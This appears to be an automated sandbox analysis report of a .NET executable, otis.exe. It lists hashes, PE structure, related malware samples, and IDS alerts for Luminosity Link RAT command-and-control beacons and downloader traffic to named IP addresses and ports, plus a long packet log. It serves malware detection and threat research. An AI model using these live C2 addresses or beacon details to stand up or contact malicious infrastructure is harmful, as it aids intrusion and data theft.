    987123.exeGet hashmaliciousLummaC, Eternity Stealer, LummaC Stealer, SmokeLoader, Stealc, zgRATBrowse
    • 192.36.38.33
    16GAuqLUFK.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, StealcBrowse
    • 192.36.38.33
    NBHEkIKDCr.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5SystemzBrowse
    • 192.36.38.33
    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
    • 192.36.38.33
    XqmbvBWVRN.elfGet hashmaliciousMiraiBrowse
    • 37.235.56.176
    No context
    No context
    No created / dropped files found
    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
    Entropy (8bit):5.501218592626246
    TrID:
    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    • Win32 Executable (generic) a (10002005/4) 49.78%
    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
    • Generic Win/DOS Executable (2004/3) 0.01%
    • DOS Executable Generic (2002/1) 0.01%
    File name:otis.exe
    File size:22'016 bytes
    MD5:3d922c89c5f0f8f9a738bec3a24d0494
    SHA1:d5b0ad895d5adbf919ed6771292410df924fdd00
    SHA256:cb7e6640ab5c1dad5083e5790d6009c317894406b970d42a34758e99a9ff7f94
    SHA512:500f43580fd4e19cbf0c833cd44a2e92cf307ed8055a48a185da40e814cabc37204f83070da372220c8866a0c24a72b4ebae6714c8426c5d2c5d504d6c1b4d28
    SSDEEP:384:XQq1xmsrEE/FL36Rvz+MXPM0jJ/ALE4ziUtVEEAcdx+xrlCWJr:X8CEKF36RvzRJCEMgyDERCWJr
    TLSH:19A22A4DA3ACCA3BEB5F1BBD64B2436287B1D255A117FBAA8EC8F6D43C07340044456B
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....X..........."...0..N...........l... ........@.. ....................................`................................
    Icon Hash:90cececece8e8eb0
    Entrypoint:0x406c9e
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Time Stamp:0xB658ECE9 [Sat Dec 11 08:18:49 2066 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:4
    OS Version Minor:0
    File Version Major:4
    File Version Minor:0
    Subsystem Version Major:4
    Subsystem Version Minor:0
    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
    Instruction
    jmp dword ptr [00402000h]
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x6c4c0x4f.text
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x298.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
    IMAGE_DIRECTORY_ENTRY_DEBUG0x6c300x1c.text
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x20000x4ca40x4e00b7462f6534755f556cdb5f1a5d657d13False0.5072115384615384data5.766776919396873IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rsrc0x80000x2980x4003de4c7942443a7a75c7669f30cfda13bFalse0.2939453125data2.1007893131205564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .reloc0xa0000xc0x200d48209f22d80462bc43cac6ca4f50c10False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
    NameRVASizeTypeLanguageCountryZLIB Complexity
    RT_VERSION0x80580x23cdata0.46853146853146854
    DLLImport
    mscoree.dll_CorExeMain
    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
    2024-11-13T08:05:15.387383+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449730TCP
    2024-11-13T08:05:28.419802+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.449737192.121.170.1066969TCP
    2024-11-13T08:05:30.239490+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973891.132.92.2319314TCP
    2024-11-13T08:05:30.395781+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.449739192.121.170.1066969TCP
    2024-11-13T08:05:32.223185+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974091.132.92.2319314TCP
    2024-11-13T08:05:32.383336+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.449741192.121.170.1066969TCP
    2024-11-13T08:05:34.237402+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974291.132.92.2319314TCP
    2024-11-13T08:05:34.302832+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.449743192.121.170.1066969TCP
    2024-11-13T08:05:36.165379+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974491.132.92.2319314TCP
    2024-11-13T08:05:36.306609+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.449745192.121.170.1066969TCP
    2024-11-13T08:05:38.174755+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974691.132.92.2319314TCP
    2024-11-13T08:05:38.282732+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.449747192.121.170.1066969TCP
    2024-11-13T08:05:44.133604+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974891.132.92.2319314TCP
    2024-11-13T08:05:44.301388+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.449749192.121.170.1066969TCP
    2024-11-13T08:05:46.204734+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44975091.132.92.2319314TCP
    2024-11-13T08:05:46.335595+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.449751192.121.170.1066969TCP
    2024-11-13T08:05:48.151428+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44975291.132.92.2319314TCP
    2024-11-13T08:05:48.251740+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.449753192.121.170.1066969TCP
    2024-11-13T08:05:50.100520+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44975491.132.92.2319314TCP
    2024-11-13T08:05:50.227877+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.449755192.121.170.1066969TCP
    2024-11-13T08:05:52.051668+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44975691.132.92.2319314TCP
    2024-11-13T08:05:52.194039+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.449757192.121.170.1066969TCP
    2024-11-13T08:05:53.447362+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449758TCP
    2024-11-13T08:05:54.029257+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44975991.132.92.2319314TCP
    2024-11-13T08:05:58.423770+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.449766192.121.170.1066969TCP
    TimestampSource PortDest PortSource IPDest IP
    Nov 13, 2024 08:05:27.159518957 CET497369314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:27.164380074 CET93144973691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:27.164478064 CET497369314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:27.167279005 CET497369314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:27.172184944 CET93144973691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:28.074790001 CET93144973691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:28.085659981 CET93144973691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:28.085756063 CET497369314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:28.089674950 CET497369314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:28.094825029 CET93144973691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:28.094899893 CET497369314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:28.330965996 CET497376969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:28.335851908 CET696949737192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:28.335952997 CET497376969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:28.403536081 CET497376969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:28.408417940 CET696949737192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:28.413667917 CET497376969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:28.419749022 CET696949737192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:28.419801950 CET497376969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:28.425446033 CET696949737192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:29.276905060 CET696949737192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:29.277127028 CET497376969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:29.286072016 CET497376969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:29.290919065 CET696949737192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:29.316107035 CET497389314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:29.320914030 CET93144973891.132.92.231192.168.2.4
    Nov 13, 2024 08:05:29.321001053 CET497389314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:29.321250916 CET497389314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:29.325984001 CET93144973891.132.92.231192.168.2.4
    Nov 13, 2024 08:05:30.229161978 CET93144973891.132.92.231192.168.2.4
    Nov 13, 2024 08:05:30.239419937 CET93144973891.132.92.231192.168.2.4
    Nov 13, 2024 08:05:30.239490032 CET497389314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:30.239617109 CET497389314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:30.245491982 CET93144973891.132.92.231192.168.2.4
    Nov 13, 2024 08:05:30.245548010 CET497389314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:30.329960108 CET497396969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:30.334763050 CET696949739192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:30.334849119 CET497396969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:30.343534946 CET497396969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:30.348396063 CET696949739192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:30.390959978 CET497396969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:30.395731926 CET696949739192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:30.395781040 CET497396969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:30.400527000 CET696949739192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:31.267457962 CET696949739192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:31.267550945 CET497396969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:31.269288063 CET497396969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:31.274045944 CET696949739192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:31.296567917 CET497409314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:31.301414967 CET93144974091.132.92.231192.168.2.4
    Nov 13, 2024 08:05:31.301532030 CET497409314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:31.301664114 CET497409314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:31.306406021 CET93144974091.132.92.231192.168.2.4
    Nov 13, 2024 08:05:32.212677002 CET93144974091.132.92.231192.168.2.4
    Nov 13, 2024 08:05:32.223125935 CET93144974091.132.92.231192.168.2.4
    Nov 13, 2024 08:05:32.223185062 CET497409314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:32.223265886 CET497409314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:32.228466034 CET93144974091.132.92.231192.168.2.4
    Nov 13, 2024 08:05:32.228517056 CET497409314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:32.326950073 CET497416969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:32.331816912 CET696949741192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:32.331895113 CET497416969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:32.341295004 CET497416969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:32.346143961 CET696949741192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:32.378406048 CET497416969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:32.383266926 CET696949741192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:32.383336067 CET497416969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:32.388227940 CET696949741192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:33.305167913 CET696949741192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:33.305258036 CET497416969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:33.306355953 CET497416969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:33.311887026 CET696949741192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:33.328049898 CET497429314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:33.333554983 CET93144974291.132.92.231192.168.2.4
    Nov 13, 2024 08:05:33.333638906 CET497429314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:33.333884001 CET497429314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:33.339397907 CET93144974291.132.92.231192.168.2.4
    Nov 13, 2024 08:05:34.227034092 CET93144974291.132.92.231192.168.2.4
    Nov 13, 2024 08:05:34.237314939 CET93144974291.132.92.231192.168.2.4
    Nov 13, 2024 08:05:34.237401962 CET497429314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:34.237453938 CET497429314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:34.242769957 CET93144974291.132.92.231192.168.2.4
    Nov 13, 2024 08:05:34.242827892 CET497429314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:34.248945951 CET497436969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:34.253751040 CET696949743192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:34.253942966 CET497436969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:34.262490034 CET497436969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:34.267255068 CET696949743192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:34.297967911 CET497436969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:34.302758932 CET696949743192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:34.302831888 CET497436969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:34.307665110 CET696949743192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:35.226387978 CET696949743192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:35.226509094 CET497436969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:35.230160952 CET497436969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:35.235069990 CET696949743192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:35.249777079 CET497449314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:35.254719973 CET93144974491.132.92.231192.168.2.4
    Nov 13, 2024 08:05:35.254795074 CET497449314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:35.255582094 CET497449314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:35.260432005 CET93144974491.132.92.231192.168.2.4
    Nov 13, 2024 08:05:36.154927969 CET93144974491.132.92.231192.168.2.4
    Nov 13, 2024 08:05:36.165316105 CET93144974491.132.92.231192.168.2.4
    Nov 13, 2024 08:05:36.165379047 CET497449314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:36.165452003 CET497449314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:36.171235085 CET93144974491.132.92.231192.168.2.4
    Nov 13, 2024 08:05:36.171303988 CET497449314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:36.247821093 CET497456969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:36.252773046 CET696949745192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:36.252856016 CET497456969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:36.261929035 CET497456969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:36.266786098 CET696949745192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:36.301799059 CET497456969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:36.306543112 CET696949745192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:36.306608915 CET497456969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:36.311414003 CET696949745192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:37.235996008 CET696949745192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:37.236198902 CET497456969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:37.237138987 CET497456969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:37.241905928 CET696949745192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:37.264528036 CET497469314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:37.269377947 CET93144974691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:37.269489050 CET497469314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:37.269653082 CET497469314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:37.274451971 CET93144974691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:38.163793087 CET93144974691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:38.174320936 CET93144974691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:38.174755096 CET497469314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:38.174916983 CET497469314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:38.180087090 CET93144974691.132.92.231192.168.2.4
    Nov 13, 2024 08:05:38.182732105 CET497469314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:38.202047110 CET497476969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:38.206974030 CET696949747192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:38.210767984 CET497476969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:38.222321987 CET497476969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:38.227231979 CET696949747192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:38.277864933 CET497476969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:38.282681942 CET696949747192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:38.282732010 CET497476969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:38.287528038 CET696949747192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:39.978527069 CET696949747192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:39.978619099 CET497476969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:39.979208946 CET696949747192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:39.979260921 CET497476969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:39.979338884 CET696949747192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:39.979381084 CET497476969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:39.979489088 CET497476969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:39.984267950 CET696949747192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:43.234250069 CET497489314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:43.239145041 CET93144974891.132.92.231192.168.2.4
    Nov 13, 2024 08:05:43.239296913 CET497489314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:43.239478111 CET497489314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:43.244389057 CET93144974891.132.92.231192.168.2.4
    Nov 13, 2024 08:05:44.123017073 CET93144974891.132.92.231192.168.2.4
    Nov 13, 2024 08:05:44.133430958 CET93144974891.132.92.231192.168.2.4
    Nov 13, 2024 08:05:44.133604050 CET497489314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:44.133685112 CET497489314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:44.138780117 CET93144974891.132.92.231192.168.2.4
    Nov 13, 2024 08:05:44.138835907 CET497489314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:44.233175993 CET497496969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:44.238003969 CET696949749192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:44.238102913 CET497496969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:44.253307104 CET497496969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:44.258101940 CET696949749192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:44.296502113 CET497496969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:44.301309109 CET696949749192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:44.301388025 CET497496969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:44.306180954 CET696949749192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:45.179465055 CET696949749192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:45.179533005 CET497496969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:45.216290951 CET497496969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:45.221086025 CET696949749192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:45.285494089 CET497509314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:45.290380955 CET93144975091.132.92.231192.168.2.4
    Nov 13, 2024 08:05:45.290446043 CET497509314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:45.292557955 CET497509314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:45.297415018 CET93144975091.132.92.231192.168.2.4
    Nov 13, 2024 08:05:46.194188118 CET93144975091.132.92.231192.168.2.4
    Nov 13, 2024 08:05:46.204577923 CET93144975091.132.92.231192.168.2.4
    Nov 13, 2024 08:05:46.204734087 CET497509314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:46.204765081 CET497509314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:46.210122108 CET93144975091.132.92.231192.168.2.4
    Nov 13, 2024 08:05:46.210175037 CET497509314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:46.280060053 CET497516969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:46.285151958 CET696949751192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:46.285229921 CET497516969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:46.294198036 CET497516969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:46.299062014 CET696949751192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:46.330548048 CET497516969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:46.335530996 CET696949751192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:46.335594893 CET497516969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:46.340439081 CET696949751192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:47.227291107 CET696949751192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:47.227391958 CET497516969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:47.228164911 CET497516969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:47.233072042 CET696949751192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:47.249573946 CET497529314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:47.254466057 CET93144975291.132.92.231192.168.2.4
    Nov 13, 2024 08:05:47.254539967 CET497529314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:47.254683018 CET497529314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:47.259816885 CET93144975291.132.92.231192.168.2.4
    Nov 13, 2024 08:05:48.140949011 CET93144975291.132.92.231192.168.2.4
    Nov 13, 2024 08:05:48.151346922 CET93144975291.132.92.231192.168.2.4
    Nov 13, 2024 08:05:48.151427984 CET497529314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:48.153662920 CET497529314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:48.159076929 CET93144975291.132.92.231192.168.2.4
    Nov 13, 2024 08:05:48.159135103 CET497529314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:48.194674969 CET497536969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:48.199620962 CET696949753192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:48.199691057 CET497536969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:48.208834887 CET497536969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:48.213628054 CET696949753192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:48.246861935 CET497536969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:48.251697063 CET696949753192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:48.251739979 CET497536969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:48.256521940 CET696949753192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:49.140047073 CET696949753192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:49.140131950 CET497536969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:49.140973091 CET497536969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:49.145850897 CET696949753192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:49.171530962 CET497549314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:49.176357031 CET93144975491.132.92.231192.168.2.4
    Nov 13, 2024 08:05:49.176445007 CET497549314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:49.176573038 CET497549314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:49.181291103 CET93144975491.132.92.231192.168.2.4
    Nov 13, 2024 08:05:50.100148916 CET93144975491.132.92.231192.168.2.4
    Nov 13, 2024 08:05:50.100519896 CET497549314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:50.116837025 CET93144975491.132.92.231192.168.2.4
    Nov 13, 2024 08:05:50.116945028 CET497549314192.168.2.491.132.92.231
    Nov 13, 2024 08:05:50.155239105 CET497556969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:50.160063982 CET696949755192.121.170.106192.168.2.4
    Nov 13, 2024 08:05:50.160249949 CET497556969192.168.2.4192.121.170.106
    Nov 13, 2024 08:05:50.172499895 CET497556969192.168.2.4192.121.170.106
